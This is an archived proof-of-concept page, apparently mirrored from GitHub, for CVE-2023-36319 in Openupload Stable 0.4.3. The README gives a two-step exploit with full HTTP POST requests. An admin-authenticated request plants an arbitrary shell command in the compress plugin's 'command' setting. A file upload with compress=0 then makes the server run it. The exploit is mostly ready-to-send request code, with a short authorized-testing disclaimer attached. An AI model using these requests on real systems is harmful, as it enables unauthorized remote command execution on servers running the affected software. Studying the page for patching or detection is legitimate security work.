POC详情: 4c519056308b5b8f15772acda0c94510e75e93a0

来源
https://github.com/Lowalu/CVE-2023-36319
关联漏洞
标题: Openupload Stable 代码问题漏洞 (CVE-2023-36319)
描述:Openupload Stable是一个Web应用。 Openupload Stable v.0.4.3版本存在安全漏洞,该漏洞源于文件compress-inc.php存在文件上传漏洞。攻击者可利用该漏洞通过action参数执行任意代码。
描述
exp4CVE-2023-36319
介绍
# CVE-2023-36319

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.


**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

## Affected version:
[openupload Stable version 0.4.3](https://openupload.sourceforge.net/)

### Step one
Log in to the backend and click on the function:
Administration ->Plugins ->compress

Add new “command” directive and save:

```
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 183
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
```

### Step two
Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

```
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

action=u&step=3&description=123&emailme=no&compress=0
```
The commands we write will be executed normally.
文件快照

 [4.0K]  /data/pocs/4c519056308b5b8f15772acda0c94510e75e93a0
└── [2.0K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。